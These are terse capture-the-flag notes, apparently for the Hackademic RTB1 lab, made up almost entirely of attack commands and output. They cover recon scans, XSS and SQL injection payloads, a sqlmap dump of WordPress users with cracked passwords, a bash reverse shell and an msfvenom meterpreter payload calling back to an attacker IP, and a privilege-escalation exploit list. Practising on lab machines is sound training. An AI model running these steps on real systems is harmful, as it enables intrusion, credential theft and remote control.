recon
nmap -sV -sU -p- -v -A 192.168.1.2
whatweb -v 192.168.1.2
wpscan --url http://192.168.1.2 -e p,t,tt,u,m
dirb http://192.168.1.2/Hackademic_RTB1
dirb http://192.168.1.2
vulnerability
xss
url ⇒
PAYLOADS =
{
‘Payloads’:'</p><script>alert(1);</script><p>',
‘Payloads’:'</p><script>alert(1);</script><p>'
}
sql
URL ⇒
PAYLOADS ={
‘
Payload
’:'1 AND 1=1 ',
‘
Payload
’:'"Sleep(2)',
}
explit
sqlmap -u 192.168.1.2/Hackademic_RTB1/?cat=1 -D wordpress -T wp_users --dump
| UserName | Has | Password | |
|---|---|---|---|
| NickJames | 21232f297a57a5a743894a0e4a801fc3 | admin | |
| JohnSmith | b986448f0bb9e5e124ca91d3d650f52c | PUPPIES | |
| GeorgeMiller | 7cbb3252ba6b7e9c422fac5334d22054 | q1w2e3 | |
| TonyBlack | a6e514f9486b83cb53d8d932f9a04292 | napoleon | |
| JasonKonnors | 8601f6e1028a8e8a966f6c33fcd9aec4 | maxwell | |
| MaxBucky | 50484c19f1afdaf3841a0d821ed393d2 | kernel |
nc -lvp 5555
Payload = system('bash -i >& /dev/tcp/192.168.1.14/5555 0>&1');
msfvenom -p linux/x86/meterpreter_reverse_tcp LHOST=192.168.1.14 LPORT=9090 -f elf -o shell.bin
use post/multi/recon/local_exploit_suggester
[+] 192.168.1.2 - exploit/linux/local/glibc_origin_expansion_priv_esc: The target appears to be vulnerable.
[+] 192.168.1.2 - exploit/linux/local/libuser_roothelper_priv_esc: The service is running, but could not be validated.
[+] 192.168.1.2 - exploit/linux/local/pkexec: The target appears to be vulnerable.
[+] 192.168.1.2 - exploit/linux/local/ptrace_sudo_token_priv_esc: The service is running, but could not be validated.
[+] 192.168.1.2 - exploit/linux/local/rds_rds_page_copy_user_priv_esc: The target appears to be vulnerable.
[+] 192.168.1.2 - exploit/linux/local/su_login: The target appears to be vulnerable